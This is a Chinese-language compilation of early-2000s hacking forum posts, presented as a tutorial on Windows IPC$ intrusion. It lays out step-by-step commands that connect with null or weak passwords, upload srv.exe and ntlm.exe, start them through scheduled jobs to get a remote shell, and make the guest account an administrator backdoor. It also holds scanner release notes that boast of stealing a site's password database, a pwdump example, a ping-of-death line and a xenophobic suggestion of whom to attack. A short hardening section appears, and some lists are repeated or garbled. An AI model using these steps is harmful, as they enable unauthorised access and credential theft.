虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

黑客工具--流光？

【流光 2001 For NT/2000】

SQL Server扫描：速度是Sqldict的7倍。

测试一：255台主机的网段，SQL 40台，5分钟内成功得到18个SA。

测试二：255台主机的网段，SQL 38台，5分钟内成功得到12个SA。

【流影 Http Edition Beta 2】情况

流影Http Edtion Beta2的改进：

1、提高了探测速度，在我养的鸡上面，每分钟可以扫描2500次，也就是说一天可以扫描3,600,000次，大约是前版速度的5倍。

2、可以作为NT的一个Service登陆。就是可以直接用netsvc启动。

3、控制的方便性。进行修改、删除当前命令行，并且可以重复输入上一次的命令。此外登陆时密码也不再是明文显示了。

目前还需要在NT4中做一些测试，不久即可提供下载。

【流光2000 Preview 3 For NT/2000】升级

流光2000 Preview 3发布，需要先下载Preview 2 For NT/2000。修正BUG：

1、在Import时选择取消时出错的问题。

2、修正HTTP/Proxy时误报的问题。目前有一部分网站在多次探测失败时会禁止当前IP的登陆，对于目前这个问题没有太好的解决方法，唯一可以解决方法是采用一个Proxy列表自动切换。目前我没有太多的Proxy，如果您有请发给给我一份，以便我能调试。

其他：

今天突然想看看国内用户一般采用的密码是什么，于是随便挑了一个网站，经过一系列步骤登陆进去，将其用户注册数据库下载了。大约有87M（晕倒，还好是DDN上网用了大约10分钟就下载完了），有将近30000个用户和密码。于是做了一个简单的统计，使用密码最多的是0000、00000、000000、0000000、00000000、aaaa、1111.......等，其余密码85%都使用数字。我将密码整理了一遍，又需要的可以下载。

【光和影子】-流光/流影实例说明

光和影子

【流影 POP3 Edtion】发布

【流影 HTTP Edtion】发布

【流影 POP3 Edtion】使用说明

使用说明

【流影 POP3 Edtion】开发顺利

目前开发顺利，不久即可提供下载。

【流光2000】 Preview 2 (中/英文版) For Windows 98 发布

由于很多用户没有安装NT/2000，所以特别定制了一个能在98下面运行的版本，但是此版本没有IPC（Inter Process Communication)功能。

【流光2000】Preview 2 (中/英文版）For Windows NT/2000 发布

包括几个工具（在Tools目录中）以及一个关于利用2000作为跳板的说明。

【溯雪Beta7】For Windows 98/NT/2000发布

支持任意大字典，支持需要身份认证的Proxy，不再会出现假死机。

【论坛更换】

由于最近总有人在我的论坛上面捣乱，所以决定更换论坛。

【流光2000】Preview 2 中英文版将同时发布

【RunAsEx】For Windows NT 3.51/4.0/2000

用途：在Windows NT中以指定用户身份创建进程。

当我们用Srv.exe（NetCat)登录之后，发现有很多程序无法运行，例如：pwdump，尽管这个时候已经具有了Administrator的密码。

用AT命令创建的进程，Windows NT是以系统帐号的身份运行的，而不是创建者的帐号。系统帐号的权限是有限的，例如不能启动和网络相关的程序。

Windows 2000中提供了一个RunAs程序就是实现这个功能的，但是如果用Srv.exe登陆，由于无法更改回显模式而无法使用。除非使用Telnet登陆。NT4.0没有Telnet服务，所以即使将RunAs复制到NT4.0中，也会因为前面说的原因无法使用。所以特地写了一个小工具RunAsEx。

RunAsEx可以适用于NT4.0/2000，可以在Srv.exe登陆的连接中使用。

RunAsEx UserName Password Execute File ["Execute Option"]

UserName 运行创建程序的用户名称

Password 创建程序的用户密码，如果密码为空，以*号代替。

Execute File 可执行文件名，必须为全路径，带后缀。

["Execute Option"] 可执行文件的命令行选项，如果无需选项，此项可以不填。选项必须以"开始和结束。

例如：

RunAsEx Administrator password \winnt\pwdump.exe "pwd.txt"

RunAsEx Administrator password \winnt\system32\net.exe "user Hakcer /add"

注意：此工具不能在本地运行

可在【小榕作品】中下载。

【流光 2000】For Windows 2000/NT Preview 2 Update

修正Socket超时及线程同步问题，线程可以更加稳定运行。

【流光 2000】For Windows 2000/NT 4.0 Preview 1 Announced

可以在Windows 2000及Windows NT 4.0中运行，但是没有在NT4.0中做过测试。

不能运行于Windows 9.x。

可以运行于局域网，但是IPC$探测功能对国内IP保留。

建议不要强制退出，否则会导致内存泄漏(Memory Leak)。

【流光 2000】将会发布一个英文版。

【溯雪】Beta 7稍后发布。

一年前的今天，【流光1.0】问世，在随后一年的时间里又经历了1.1、1.12、1.13、1.25、1.27、2.0、2.5、2.5SE、3.0等版本，代码由7,000行发展到76,000行，目前用户数将近400,000。开发正因为有了这么多朋友的支持，我才得以坚持做下去。在此，小榕深表感谢！

请到【小榕作品】下载。

------------------

用许多的时间去后悔，不如再开始新的努力！

我是一只大大大鸵鸟，想要飞也飞也飞不高！

黑客DOS命令或其它命令入侵他人电脑的具体步骤?

IPC$入侵

一 唠叨一下：

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄.

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的许多迷惑(你随便找一个hack论坛搜一下ipc,看存在的疑惑有多少).

因此我写了这篇相当于解惑的教程.想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!如果你看完这篇帖子仍有疑问,请马上回复!

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的)，它是为了让进程间通信而开放的命名管道，可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。

利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的)，而利用这个空的连接，连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。

我们总在说ipc$漏洞ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$)。

所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用心者(到底是什么用心?我也不知道,代词一个)会利用IPC$，访问共享资源,导出用户列表,并使用一些字典工具，进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的.

解惑:

1)IPC连接是Windows NT及以上系统中特有的远程网络登陆功能，其功能相当于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函数，所以不能在Windows 9.x中运行。

也就是说只有nt/2000/xp才可以建立ipc$连接,98/me是不能建立ipc$连接的(但有些朋友说在98下能建立空的连接,不知道是真是假,不过现在都2003年了,建议98的同志换一下系统吧,98不爽的)

2)即使是空连接也不是100%都能建立成功,如果对方关闭了ipc$共享,你仍然无法建立连接

3)并不是说建立了ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表

三 建立ipc$连接在hack攻击中的作用

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!!

(基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是2000server，还可以考虑开启终端服务方便控制.怎么样?够厉害吧!)

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码会越来越难的:(

因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现ipc$连接并不是万能的,甚至在主机不开启ipc$共享时,你根本就无法连接.

所以我认为,你不要把ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是ipc$连接在hack入侵中的意义所在.

四 ipc$与空连接,139,445端口,默认共享的关系

以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的BBS可以说是菜鸟的天堂)

1)ipc$与空连接:

不需要用户名与密码的ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特定的用户名和密码进行ipc$连接),自然就不能叫做空连接了.

许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧,不要偷懒哟).

2)ipc$与139,445端口:

ipc$连接可以实现远程登陆及对默认共享的访问;而139端口的开启表示netbios协议的应用,我们可以通过139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接是需要139或445端口来支持的.

3)ipc$与默认共享

默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑盘(c$,d$,e$……)和系统目录winnt或windows(admin$),我们通过ipc$连接可以实现对这些默认共享的访问(前提是对方没有关闭这些默认共享)

五 ipc$连接失败的原因

以下5个原因是比较常见的:

1)你的系统不是NT或以上操作系统;

2)对方没有打开ipc$默认共享

3)对方未开启139或445端口(惑被防火墙屏蔽)

4)你的命令输入有误(比如缺少了空格等)

5)用户名或密码错误(空连接当然无所谓了)

另外,你也可以根据返回的错误号分析原因：

错误号5，拒绝访问 ： 很可能你使用的用户不是管理员权限的，先提升权限；

错误号51，Windows 无法找到网络路径 : 网络有问题；

错误号53，找不到网络路径 ： ip地址错误；目标未开机；目标lanmanserver服务未启动；目标有防火墙（端口过滤）；

错误号67，找不到网络名 ： 你的lanmanworkstation服务未启动；目标删除了ipc$；

错误号1219，提供的凭据与已存在的凭据集冲突 ： 你已经和对方建立了一个ipc$，请删除再连。

错误号1326，未知的用户名或错误密码 ： 原因很明显了；

错误号1792，试图登录，但是网络登录服务没有启动 ： 目标NetLogon服务未启动。（连接域控会出现此情况）

错误号2242，此用户的密码已经过期 ： 目标有帐号策略，强制定期要求更改密码。

关于ipc$连不上的问题比较复杂，除了以上的原因,还会有其他一些不确定因素,在此本人无法详细而确定的说明,就靠大家自己体会和试验了.

六 如何打开目标的IPC$(此段引自相关文章)

首先你需要获得一个不依赖于ipc$的shell，比如sql的cmd扩展、telnet、木马,当然，这shell必须是admin权限的,然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上面可以知道，ipc$能否使用还有很多条件。请确认相关服务都已运行，没有就启动它（不知道怎么做的请看net命令的用法）,还是不行的话（比如有防火墙，杀不了）建议放弃。

七 如何防范ipc$入侵

1禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖win2000下的空会话》)

首先运行regedit，找到如下组建[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：00000001(如果设置为2的话,有一些问题会发生,比如一些WIN的服务出现问题等等)

2禁止默认共享

1）察看本地共享资源

运行-cmd-输入net share

2）删除共享(每次输入一个）

net share ipc$ /delete

net share admin$ /delete

net share c$ /delete

net share d$ /delete（如果有e,f,……可以继续删除）

3）停止server服务

net stop server /y （重新启动后server服务会重新开启）

4）修改注册表

运行-regedit

server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。

pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。

如果上面所说的主键不存在，就新建(右击-新建-双字节值）一个主健再改键值。

3永久关闭ipc$和默认共享依赖的服务:lanmanserver即server服务

控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-已禁用

4安装防火墙(选中相关设置)，或者端口过滤(滤掉139,445等),或者用新版本的优化大师

5设置复杂密码，防止通过ipc$穷举密码

（本教程不定期更新，欲获得最新版本，请登陆官方网站：菜菜鸟社区原创）

八 相关命令

1)建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

2)建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

3)映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

4)删除一个ipc$连接

net use \\IP\ipc$ /del

5)删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

九 经典入侵模式

这个入侵模式太经典了,大部分ipc教程都有介绍,我也就拿过来引用了,在此感谢原创作者!(不知道是哪位前辈)

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9. Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机)

十 总结:

关于ipc入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论.

最后,希望大家不要随便入侵,我写这篇文章的目的是想解答大家的疑惑,并不是鼓励大家随便的入侵,如果你非想试一下,建议拿小日本的机子开练(什么?为什么?因为我讨厌日本,没别的)

黑客常用的网络命令有哪些呀 分别是什么呀 怎么用的呀

net user heibai lovechina /add 加一个heibai的用户密码为lovechina

net localgroup Administrators heibai /add 把他加入Administrator组

net start telnet 开对方的TELNET服务

net use z:\127.0.0.1c$ 映射对方的C盘

net user guest /active:yes 将Guest用户激活

net user guest lovechina 把guest的密码改为lovechina

net user 查看所有用户列表

net user 用户名 /delete 删掉

net time \\127.0.0.1 得到对方的时间，

get c:\index.htm d:\ 上传的文件是INDEX.HTM，它位于C:\下，传到对方D:\

copy index.htm \\127.0.0.1\c$\index.htm 本地C盘下的index.htm复制到127.0.0.1的C盘

NET VIEW 显示域列表、计算机列表或指定计算机的共

计算机运行命令全集 winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

winver---------检查Windows版本

wmimgmt.msc----打开windows管理体系结构

wupdmgr--------windows更新程序

wscript--------windows脚本宿主设置

write----------写字板winmsd-----系统信息

wiaacmgr-------扫描仪和照相机向导

winchat--------XP自带局域网聊天

mem.exe--------显示内存使用情况

Msconfig.exe---系统配置实用程序

mplayer2-------简易widnows media player

mspaint--------画图板

mstsc----------远程桌面连接

net use \\ip\ipc$ " " /user:" " 建立IPC空链接

net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接

net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:

net use h: \\ip\c$ 登陆后映射对方C：到本地为H:

net use \\ip\ipc$ /del 删除IPC链接

net use h: /del 删除映射对方到本地的为H:的映射

net user 用户名 密码 /add 建立用户

net user guest /active:yes 激活guest用户

net user 查看有哪些用户

net user 帐户名 查看帐户的属性

net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数

net start 查看开启了哪些服务

net start 服务名 开启服务；(如:net start telnet， net start schedule)

net stop 服务名 停止某服务

net time \\目标ip 查看对方时间

net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

net view 查看本地局域网内开启了哪些共享

net view \\ip 查看对方局域网内开启了哪些共享

net config 显示系统网络设置

net logoff 断开连接的共享

net pause 服务名 暂停某服务

net send ip "文本信息" 向对方发信息

net ver 局域网内正在使用的网络连接类型和信息

net share 查看本地开启的共享

net share ipc$ 开启ipc$共享

net share ipc$ /del 删除ipc$共享

net share c$ /del 删除C：共享

net user guest 12345 用guest用户登陆后用将密码改为12345

net password 密码 更改系统登陆密码

netstat -a 查看开启了哪些端口,常用netstat -an

netstat -n 查看端口的网络连接情况，常用netstat -an

netstat -v 查看正在进行的工作

netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）

netstat -s 查看正在使用的所有协议使用情况

nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写

tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。

ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。

ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)

ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息

tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)

del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

mplayer2-------媒体播放机

magnify--------放大镜实用程序

mmc------------打开控制台

mobsync--------同步命令

dxdiag---------检查DirectX信息

drwtsn32------ 系统医生

devmgmt.msc--- 设备管理器

dfrg.msc-------磁盘碎片整理程序

diskmgmt.msc---磁盘管理实用程序

dcomcnfg-------打开系统组件服务

ddeshare-------打开DDE共享设置

dvdplay--------DVD播放器

net stop messenger-----停止信使服务

net start messenger----开始信使服务

notepad--------打开记事本

nslookup-------网络管理的工具向导

ntbackup-------系统备份和还原

narrator-------屏幕"讲述人"

ntmsmgr.msc----移动存储管理器

ntmsoprq.msc---移动存储管理员操作请求

netstat -an----(TC)命令检查接口

syncapp--------创建一个公文包

sysedit--------系统配置编辑器

sigverif-------文件签名验证程序

sndrec32-------录音机

shrpubw--------创建共享文件夹

secpol.msc-----本地安全策略

syskey---------系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

services.msc---本地服务设置

Sndvol32-------音量控制程序

sfc.exe--------系统文件检查器

sfc /scannow---windows文件保护

Nslookup-------60秒倒计时关机命令

tourstart------xp简介（安装完成后出现的漫游xp程序）

taskmgr--------任务管理器

eventvwr-------事件查看器

eudcedit-------造字程序

explorer-------打开资源管理器

packager-------对象包装程序

perfmon.msc----计算机性能监测程序

progman--------程序管理器

regedit.exe----注册表

rsop.msc-------组策略结果集

regedt32-------注册表编辑器

rononce -p ----15秒关机

regsvr32 /u *.dll----停止dll文件运行

regsvr32 /u zipfldr.dll------取消ZIP支持

cmd.exe--------CMD命令提示符

chkdsk.exe-----Chkdsk磁盘检查

certmgr.msc----证书管理实用程序

calc-----------启动计算器

charmap--------启动字符映射表

cliconfg-------SQL SERVER 客户端网络实用程序

Clipbrd--------剪贴板查看器

conf-----------启动netmeeting

compmgmt.msc---计算机管理

cleanmgr-------**整理

ciadv.msc------索引服务程序

osk------------打开屏幕键盘

odbcad32-------ODBC数据源管理器

oobe/msoobe /a----检查XP是否激活

lusrmgr.msc----本机用户和组

logoff---------注销命令

iexpress-------木马捆绑工具，系统自带

Nslookup-------IP地址侦测器

fsmgmt.msc-----共享文件夹管理器

utilman--------辅助工具管理器

gpedit.msc-----组策略